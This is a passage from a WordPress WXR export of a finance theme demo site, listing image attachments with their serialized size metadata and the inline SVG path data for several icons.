lue>
		</wp:postmeta>
							</item>
					<item>
		<title>image2-home4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/image2-home4/</link>
		<pubDate>Wed, 11 Nov 2020 03:53:15 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image2-home4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1831</wp:post_id>
		<wp:post_date><![CDATA[2020-11-11 03:53:15]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-11 03:53:15]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image2-home4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image2-home4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/image2-home4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:736;s:6:"height";i:500;s:4:"file";s:24:"2020/11/image2-home4.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:24:"image2-home4-300x204.jpg";s:5:"width";i:300;s:6:"height";i:204;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"image2-home4-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"image2-home4-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"image2-home4-600x500.jpg";s:5:"width";i:600;s:6:"height";i:500;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-home4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/bg1-home4/</link>
		<pubDate>Wed, 11 Nov 2020 04:48:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-home4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1849</wp:post_id>
		<wp:post_date><![CDATA[2020-11-11 04:48:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-11 04:48:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-home4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-home4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/bg1-home4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:800;s:4:"file";s:21:"2020/11/bg1-home4.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:21:"bg1-home4-300x125.jpg";s:5:"width";i:300;s:6:"height";i:125;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg1-home4-1024x427.jpg";s:5:"width";i:1024;s:6:"height";i:427;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg1-home4-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg1-home4-768x320.jpg";s:5:"width";i:768;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg1-home4-1536x640.jpg";s:5:"width";i:1536;s:6:"height";i:640;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg1-home4-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg1-home4-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:22:"bg1-home4-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:22:"bg1-home4-1200x800.jpg";s:5:"width";i:1200;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>certificate</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/certificate/</link>
		<pubDate>Wed, 11 Nov 2020 07:10:42 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/certificate.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1867</wp:post_id>
		<wp:post_date><![CDATA[2020-11-11 07:10:42]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-11 07:10:42]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[certificate]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/certificate.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/certificate.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 470 470"><g><path d="m429.591,418.378l-62.223-150.218c-1.585-3.826-5.972-5.645-9.799-4.059s-5.645,5.973-4.059,9.799l56.251,135.801-51.309-14.867c-3.368-0.977-6.965,0.513-8.656,3.586l-25.769,46.793-60.357-145.716c69.663-13.434 122.447-74.853 122.447-148.378 0.001-83.327-67.79-151.119-151.117-151.119s-151.119,67.792-151.119,151.119c0,33.751 11.124,64.951 29.896,90.133l-73.368,177.126c-1.103,2.664-0.582,5.724 1.341,7.872 1.922,2.148 4.907,3.004 7.676,2.202l60.533-17.541 30.4,55.207c1.324,2.403 3.847,3.882 6.568,3.882 0.138,0 0.277-0.004 0.416-0.011 2.879-0.16 5.411-1.955 6.515-4.619l58.136-140.353c1.585-3.827-0.232-8.214-4.059-9.799-3.827-1.585-8.214,0.232-9.799,4.059l-52.165,125.936-25.767-46.793c-1.692-3.073-5.291-4.563-8.657-3.586l-51.308,14.867 64.397-155.469c27.598,29.52 66.86,48.005 110.364,48.005 4.491,0 8.933-0.209 13.325-0.594l67.818,163.727c1.103,2.664 3.636,4.459 6.514,4.618 0.14,0.008 0.278,0.012 0.417,0.012 2.721,0 5.244-1.479 6.567-3.882l30.401-55.207 60.533,17.541c2.771,0.803 5.753-0.054 7.676-2.202 1.923-2.148 2.443-5.208 1.34-7.872zm-330.71-267.259c2.84217e-14-75.056 61.063-136.119 136.119-136.119 75.056,0 136.118,61.063 136.118,136.119s-61.062,136.118-136.118,136.118c-75.056,0-136.119-61.062-136.119-136.118z"></path><path d="m321.659,122.961c-0.863-2.658-3.135-4.616-5.892-5.079l-50.467-8.469-23.649-45.379c-1.292-2.479-3.855-4.034-6.651-4.034-2.795,0-5.359,1.555-6.651,4.034l-23.65,45.379-50.466,8.469c-2.757,0.462-5.028,2.42-5.892,5.079-0.864,2.659-0.178,5.577 1.781,7.572l35.85,36.515-7.54,50.614c-0.412,2.765 0.748,5.529 3.01,7.173 2.26,1.642 5.249,1.891 7.751,0.646l45.807-22.812 45.806,22.812c1.059,0.527 2.203,0.787 3.343,0.787 1.557,0 3.104-0.484 4.409-1.432 2.262-1.644 3.422-4.408 3.01-7.173l-7.539-50.614 35.85-36.516c1.958-1.995 2.644-4.913 1.78-7.572zm-50.951,36.244c-1.648,1.679-2.413,4.033-2.066,6.359l5.97,40.074-36.268-18.061c-1.054-0.524-2.198-0.787-3.344-0.787-1.145,0-2.291,0.262-3.343,0.787l-36.268,18.061 5.97-40.074c0.347-2.326-0.418-4.681-2.066-6.359l-28.385-28.912 39.957-6.706c2.32-0.389 4.323-1.844 5.41-3.93l18.725-35.929 18.725,35.93c1.088,2.086 3.09,3.541 5.41,3.93l39.958,6.706-28.385,28.911z"></path><path d="m348.612,158.684c-4.107-0.549-7.877,2.343-8.42,6.45-6.957,52.507-52.18,92.104-105.192,92.104-58.514,0-106.119-47.604-106.119-106.119s47.605-106.119 106.119-106.119c53.013,0 98.235,39.596 105.192,92.104 0.543,4.107 4.32,7.001 8.42,6.45 4.105-0.544 6.994-4.314 6.449-8.42-7.94-59.936-59.555-105.134-120.061-105.134-66.785,0-121.119,54.333-121.119,121.119s54.334,121.118 121.119,121.118c60.506,0 112.121-45.198 120.062-105.134 0.544-4.105-2.344-7.875-6.45-8.419z"></path></g></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>files</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/files/</link>
		<pubDate>Wed, 11 Nov 2020 07:13:53 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/files.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1869</wp:post_id>
		<wp:post_date><![CDATA[2020-11-11 07:13:53]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-11 07:13:53]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[files]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/files.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/files.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M260.981,445.576H65.171c-12.354,0-22.405-10.051-22.405-22.405V91.202c0-4.143-3.357-7.5-7.5-7.5s-7.5,3.357-7.5,7.5   v331.969c0,20.625,16.78,37.405,37.405,37.405h195.81c4.143,0,7.5-3.357,7.5-7.5S265.124,445.576,260.981,445.576z"></path>
	<path d="M35.266,68.701c4.143,0,7.5-3.357,7.5-7.5V37.405C42.766,25.051,52.817,15,65.171,15h283.655   c12.354,0,22.405,10.051,22.405,22.405v121.67c0,4.143,3.357,7.5,7.5,7.5s7.5-3.357,7.5-7.5V37.405   C386.232,16.78,369.452,0,348.827,0H65.171C44.546,0,27.766,16.78,27.766,37.405v23.796C27.766,65.344,31.124,68.701,35.266,68.701   z"></path>
	<path d="M301.033,102.805c12.924,0,23.438-10.515,23.438-23.438s-10.514-23.438-23.438-23.438s-23.438,10.514-23.438,23.438   c0,5.101,1.643,9.823,4.421,13.675l-36.844,51.487c-2.162-0.66-4.454-1.017-6.828-1.017c-5.982,0-11.444,2.255-15.59,5.957   l-24.089-13.669c0.278-1.44,0.428-2.925,0.428-4.444c0-12.924-10.514-23.438-23.438-23.438s-23.438,10.514-23.438,23.438   c0,1.52,0.15,3.004,0.428,4.444l-24.089,13.669c-4.146-3.701-9.609-5.956-15.59-5.956c-12.924,0-23.438,10.514-23.438,23.438   s10.514,23.438,23.438,23.438s23.438-10.514,23.438-23.438c0-1.52-0.15-3.004-0.428-4.444l24.089-13.669   c4.146,3.701,9.609,5.956,15.59,5.956c5.981,0,11.444-2.255,15.59-5.956l24.089,13.669c-0.278,1.44-0.428,2.924-0.428,4.444   c0,12.924,10.514,23.438,23.438,23.438s23.438-10.514,23.438-23.438c0-5.102-1.644-9.824-4.422-13.677l36.843-51.485   C296.365,102.447,298.657,102.805,301.033,102.805z M112.965,175.386c-4.652,0-8.438-3.785-8.438-8.438s3.785-8.438,8.438-8.438   c4.653,0,8.438,3.785,8.438,8.438S117.619,175.386,112.965,175.386z M175.655,139.791c-4.653,0-8.438-3.785-8.438-8.438   s3.785-8.438,8.438-8.438c4.652,0,8.438,3.785,8.438,8.438S180.307,139.791,175.655,139.791z M238.343,175.386   c-4.652,0-8.438-3.785-8.438-8.438s3.785-8.438,8.438-8.438c4.653,0,8.438,3.785,8.438,8.438S242.997,175.386,238.343,175.386z    M301.033,70.929c4.652,0,8.438,3.785,8.438,8.438c0,4.653-3.785,8.438-8.438,8.438c-4.653,0-8.438-3.785-8.438-8.438   C292.594,74.714,296.379,70.929,301.033,70.929z"></path>
	<path d="M275.355,285.43H89.279c-4.143,0-7.5,3.357-7.5,7.5s3.357,7.5,7.5,7.5h186.076c4.143,0,7.5-3.357,7.5-7.5   S279.498,285.43,275.355,285.43z"></path>
	<path d="M81.779,378.157c0,4.143,3.357,7.5,7.5,7.5h202.743c4.143,0,7.5-3.357,7.5-7.5s-3.357-7.5-7.5-7.5H89.279   C85.136,370.657,81.779,374.015,81.779,378.157z"></path>
	<path d="M430.511,325.202c14.881-10.362,26.219-24.74,32.788-41.58c0.119-0.305,0.214-0.616,0.292-0.929   c3.833-10.075,5.909-20.904,5.909-32.037v-15.287h7.234c4.143,0,7.5-3.357,7.5-7.5v-38.796c0-4.143-3.357-7.5-7.5-7.5H280.729   c-4.143,0-7.5,3.357-7.5,7.5v38.796c0,4.143,3.357,7.5,7.5,7.5h7.234v15.287c0,11.133,2.076,21.962,5.909,32.037   c0.077,0.313,0.172,0.624,0.292,0.929c6.569,16.84,17.907,31.218,32.788,41.58c4.754,3.311,9.768,6.134,14.981,8.452v26.281   c-32.488,14.441-53.97,47.146-53.97,82.98v15.288h-7.234c-4.143,0-7.5,3.357-7.5,7.5V504.5c0,4.143,3.357,7.5,7.5,7.5h196.005   c4.143,0,7.5-3.357,7.5-7.5v-38.796c0-4.143-3.357-7.5-7.5-7.5H469.5v-15.288c0-15.772-4.111-31.31-11.891-44.933   c-2.054-3.597-6.635-4.847-10.231-2.794c-3.598,2.054-4.849,6.635-2.794,10.231c6.487,11.361,9.916,24.327,9.916,37.495v15.287   h-17.747l-31.201-37.851c-6.508-7.896-16.109-12.451-26.342-12.499c-0.055,0-0.106,0-0.161,0c-10.172,0-19.749,4.461-26.295,12.254   l-32.001,38.096h-17.789v-15.287c0-31.381,19.735-59.886,49.109-70.932c2.924-1.1,4.86-3.896,4.86-7.021v-26.187   c4.675,1.152,9.451,1.938,14.299,2.333v18.77c0,4.143,3.357,7.5,7.5,7.5s7.5-3.357,7.5-7.5v-18.77   c4.847-0.396,9.623-1.182,14.298-2.333v26.187c0,3.124,1.937,5.92,4.86,7.02c7.89,2.968,15.194,7.215,21.71,12.623   c3.187,2.646,7.916,2.207,10.561-0.98c2.646-3.187,2.207-7.915-0.98-10.561c-6.448-5.354-13.544-9.757-21.15-13.132v-26.279   C420.744,331.336,425.757,328.513,430.511,325.202z M364.24,429.755c3.688-4.39,9.08-6.901,14.81-6.901c0.03,0,0.061,0,0.091,0   c5.763,0.026,11.171,2.593,14.837,7.04l23.336,28.31h-76.971L364.24,429.755z M469.234,473.204V497H288.229v-23.796H469.234z    M288.229,220.369v-23.796h181.005v23.796H462H295.463H288.229z M405.39,321.588c-0.194,0.073-0.372,0.172-0.557,0.26   c-8.184,2.976-16.983,4.577-26.101,4.577c-9.119,0-17.92-1.602-26.105-4.578c-0.184-0.087-0.361-0.186-0.554-0.259   c-16.736-6.293-30.335-18.26-38.946-33.191h21.454c4.143,0,7.5-3.357,7.5-7.5s-3.357-7.5-7.5-7.5h-28.083   c-2.303-7.25-3.534-14.905-3.534-22.74v-15.287H454.5v15.287c0,7.835-1.231,15.491-3.534,22.74H364.58c-4.143,0-7.5,3.357-7.5,7.5   s3.357,7.5,7.5,7.5h79.757C435.726,303.328,422.126,315.294,405.39,321.588z"></path>
	<path d="M378.732,378.377c-4.143,0-7.5,3.357-7.5,7.5v3.478c0,4.143,3.357,7.5,7.5,7.5s7.5-3.357,7.5-7.5v-3.478   C386.232,381.734,382.875,378.377,378.732,378.377z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>networking</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/networking/</link>
		<pubDate>Wed, 11 Nov 2020 07:15:01 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/networking.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1870</wp:post_id>
		<wp:post_date><![CDATA[2020-11-11 07:15:01]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-11 07:15:01]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[networking]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/networking.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/networking.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M337.392,377.361c-3.438,2.311-4.352,6.971-2.041,10.408c1.447,2.154,3.817,3.317,6.231,3.317   c1.438,0,2.894-0.414,4.177-1.276c16.269-10.935,30.137-24.531,41.213-39.984c0.12-0.155,0.237-0.313,0.345-0.477   c19.123-26.889,29.79-59.369,29.79-93.349c0-34.475-10.889-66.451-29.401-92.682c-0.337-0.65-0.765-1.244-1.269-1.765   c-29.308-40.366-76.859-66.669-130.446-66.669c-23.574,0-46.297,4.979-67.537,14.798c-3.76,1.738-5.398,6.195-3.66,9.955   c1.737,3.759,6.194,5.399,9.955,3.66c9.401-4.346,19.125-7.638,29.104-9.877c-6.338,7.999-12.09,18.475-17.049,31.242   c-1.8,4.635-3.459,9.528-5.004,14.602h-55.278c6.863-7.762,14.532-14.819,22.869-20.963c3.334-2.458,4.045-7.153,1.588-10.487   c-2.458-3.334-7.153-4.044-10.487-1.588c-13.521,9.966-25.468,22.09-35.293,35.709c-0.237,0.281-0.449,0.582-0.643,0.896   c-4.379,6.158-8.331,12.614-11.792,19.313c-11.704,22.652-17.89,48.192-17.89,73.858c0,34.476,10.89,66.453,29.403,92.684   c0.336,0.648,0.763,1.24,1.266,1.76c29.308,40.368,76.86,66.672,130.448,66.672c21.485,0,42.351-4.162,62.017-12.371   c3.823-1.596,5.628-5.988,4.032-9.811c-1.595-3.822-5.99-5.626-9.81-4.032c-7.837,3.271-15.886,5.832-24.102,7.677   c6.338-7.999,12.089-18.475,17.048-31.24c1.801-4.635,3.46-9.528,5.005-14.602h55.316   C357.316,361.992,347.91,370.292,337.392,377.361z M365.396,159.263h-30.918c-4.143,0-7.5,3.358-7.5,7.5s3.357,7.5,7.5,7.5h42.572   c14.497,21.403,23.475,46.836,24.867,74.237h-78.825c-0.715-39.135-7.01-75.766-17.916-103.839   c-4.951-12.745-10.692-23.208-17.018-31.202C318.567,120.318,345.411,136.686,365.396,159.263z M203.888,263.5h104.203   c-0.528,28.173-4.011,53.335-9.326,74.237h-85.586C207.61,315.734,204.393,290.293,203.888,263.5z M203.89,248.5   c0.528-28.173,4.011-53.335,9.326-74.237h85.586c5.569,22.003,8.786,47.444,9.291,74.237H203.89z M255.991,109.883   c12.446,0,25.277,14.656,35.204,40.209c1.145,2.948,2.224,6.023,3.26,9.17h-76.878   C227.822,128.263,242.336,109.883,255.991,109.883z M126.09,189.027c2.628-5.086,5.568-10.016,8.784-14.765h62.867   c-5.312,22.341-8.368,47.708-8.852,74.237h-78.817C111.109,227.612,116.475,207.637,126.09,189.027z M146.584,352.737h30.074   c4.142,0,7.5-3.358,7.5-7.5s-3.358-7.5-7.5-7.5h-41.727c-14.498-21.403-23.475-46.836-24.867-74.237h78.825   c0.715,39.135,7.01,75.766,17.915,103.839c4.951,12.745,10.692,23.208,17.018,31.202   C193.413,391.682,166.57,375.314,146.584,352.737z M255.991,402.117c-12.446,0-25.278-14.656-35.204-40.209   c-1.145-2.948-2.224-6.023-3.26-9.17h76.878C284.159,383.737,269.645,402.117,255.991,402.117z M314.24,337.737   c5.312-22.341,8.368-47.709,8.852-74.237h78.807c-1.373,26.87-10.084,52.455-24.791,74.237H314.24z"></path>
	<path d="M414.428,113.042L300.576,47.313c-3.589-2.072-8.175-0.842-10.245,2.745c-2.071,3.587-0.842,8.174,2.745,10.245   l113.852,65.729c1.182,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.346,6.502-3.751   C419.244,119.7,418.015,115.113,414.428,113.042z"></path>
	<path d="M67.967,321.706V190.294c0-4.142-3.358-7.5-7.5-7.5s-7.5,3.358-7.5,7.5v131.412c0,4.142,3.358,7.5,7.5,7.5   S67.967,325.848,67.967,321.706z"></path>
	<path d="M406.905,385.979l-113.828,65.718c-3.587,2.071-4.816,6.658-2.745,10.245c1.389,2.406,3.91,3.751,6.502,3.751   c1.272,0,2.563-0.324,3.743-1.006l113.828-65.718c3.587-2.071,4.816-6.658,2.745-10.245   C415.079,385.137,410.491,383.907,406.905,385.979z"></path>
	<path d="M444.014,190.294v131.412c0,4.142,3.357,7.5,7.5,7.5s7.5-3.358,7.5-7.5V190.294c0-4.142-3.357-7.5-7.5-7.5   S444.014,186.152,444.014,190.294z"></path>
	<path d="M218.904,451.697l-113.851-65.729c-3.587-2.072-8.174-0.842-10.245,2.745c-2.071,3.587-0.842,8.174,2.745,10.245   l113.851,65.729c1.181,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.346,6.502-3.751   C223.72,458.354,222.491,453.768,218.904,451.697z"></path>
	<path d="M101.333,127.027c1.272,0,2.562-0.324,3.743-1.006l113.828-65.718c3.587-2.071,4.816-6.658,2.745-10.245   c-2.072-3.587-6.658-4.816-10.245-2.745L97.576,113.031c-3.587,2.071-4.816,6.658-2.745,10.245   C96.22,125.682,98.741,127.027,101.333,127.027z"></path>
	<path d="M255.991,60.46c16.669,0,30.23-13.561,30.23-30.23S272.659,0,255.991,0s-30.23,13.562-30.23,30.23   S239.322,60.46,255.991,60.46z M255.991,15c8.398,0,15.23,6.833,15.23,15.23s-6.832,15.23-15.23,15.23   c-8.398,0-15.23-6.832-15.23-15.23S247.593,15,255.991,15z"></path>
	<path d="M75.583,116.935C61.149,108.6,42.623,113.564,34.288,128c-8.334,14.436-3.371,32.961,11.065,41.295   c4.749,2.742,9.938,4.044,15.064,4.044c10.455,0,20.638-5.422,26.231-15.109C94.983,143.794,90.019,125.27,75.583,116.935z    M73.658,150.73c-4.2,7.272-13.532,9.773-20.805,5.575c-7.272-4.199-9.773-13.532-5.575-20.805   c2.034-3.523,5.318-6.043,9.248-7.096s8.034-0.513,11.557,1.521C75.356,134.125,77.857,143.458,73.658,150.73z"></path>
	<path d="M45.353,342.705C30.917,351.039,25.953,369.564,34.288,384c5.593,9.688,15.775,15.109,26.231,15.109   c5.125,0,10.316-1.303,15.064-4.044c14.436-8.334,19.399-26.859,11.065-41.295C78.313,339.333,59.787,334.371,45.353,342.705z    M68.083,382.075c-3.523,2.034-7.629,2.574-11.557,1.521c-3.93-1.053-7.214-3.573-9.248-7.096   c-4.199-7.273-1.698-16.606,5.575-20.805c7.273-4.2,16.605-1.698,20.805,5.575C77.857,368.542,75.356,377.875,68.083,382.075z"></path>
	<path d="M255.991,451.54c-16.669,0-30.23,13.561-30.23,30.23S239.322,512,255.991,512s30.23-13.562,30.23-30.23   S272.659,451.54,255.991,451.54z M255.991,497c-8.398,0-15.23-6.833-15.23-15.23s6.833-15.23,15.23-15.23   c8.398,0,15.23,6.832,15.23,15.23S264.389,497,255.991,497z"></path>
	<path d="M466.628,342.705c-14.435-8.333-32.96-3.371-41.296,11.065c-8.334,14.436-3.37,32.961,11.065,41.295   c4.658,2.689,9.827,4.063,15.066,4.063c2.625,0,5.27-0.345,7.873-1.043c7.8-2.09,14.318-7.092,18.355-14.084   c4.038-6.993,5.11-15.14,3.021-22.94C478.623,353.261,473.621,346.742,466.628,342.705z M464.702,376.5L464.702,376.5   c-2.034,3.523-5.318,6.044-9.248,7.097c-3.929,1.053-8.034,0.513-11.557-1.521c-7.272-4.199-9.773-13.532-5.575-20.805   c2.818-4.881,7.948-7.612,13.216-7.612c2.582,0,5.197,0.656,7.59,2.037c3.522,2.034,6.043,5.318,7.096,9.248   S466.737,372.977,464.702,376.5z"></path>
	<path d="M451.564,173.339c5.125,0,10.316-1.303,15.064-4.044c6.993-4.038,11.995-10.557,14.085-18.356   c2.09-7.8,1.018-15.947-3.021-22.94v0c-4.037-6.993-10.556-11.995-18.355-14.085c-7.8-2.089-15.946-1.018-22.939,3.02   c-14.436,8.334-19.399,26.859-11.065,41.296C430.926,167.918,441.108,173.34,451.564,173.339z M443.898,129.925   c2.347-1.355,4.951-2.047,7.591-2.047c1.322,0,2.654,0.174,3.966,0.525c3.93,1.053,7.214,3.573,9.248,7.096v0   c2.034,3.522,2.574,7.627,1.521,11.557s-3.573,7.214-7.096,9.248c-7.271,4.199-16.604,1.698-20.806-5.574   C434.124,143.458,436.625,134.124,443.898,129.925z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>strategy</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/strategy/</link>
		<pubDate>Wed, 11 Nov 2020 07:16:05 +0000</pubDate>
